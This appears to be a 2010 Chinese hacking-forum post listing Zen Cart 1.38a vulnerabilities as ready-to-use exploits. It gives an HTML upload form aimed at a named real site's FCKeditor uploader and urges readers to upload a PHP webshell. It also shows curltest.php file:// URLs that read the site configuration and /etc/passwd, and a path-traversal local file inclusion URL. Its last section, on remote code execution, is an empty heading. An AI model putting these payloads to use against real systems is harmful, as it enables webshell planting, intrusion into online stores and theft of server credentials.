Board logo

标题: zen cart 1.38a多处漏洞分析 [打印本页]

作者: 晓谛    时间: 2010-11-6 18:30     标题: zen cart 1.38a多处漏洞分析

zen cart 1.38a多处漏洞分析
发布日期:2010-10.27
发布作者:佚名

影响版本:zen cart 1.38a

漏洞类型:文件上传、文件包含、代码执行
漏洞描述:

漏洞1、

<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
大家试下威力。


直接上传PHP WEBSHELL 到IMAGES


漏洞2

Zen Cart 本地文件泄露
得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd


漏洞3
Zen Cart v1.3.9f (typefilter) 本地文件包含漏洞
EXP:http://127.0.0.1/index.php?typef ... %2F..%2Fboot.ini%00

直接给出EXP 很早的 依然很强大。。。。。。

漏洞4、远程代码执行




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2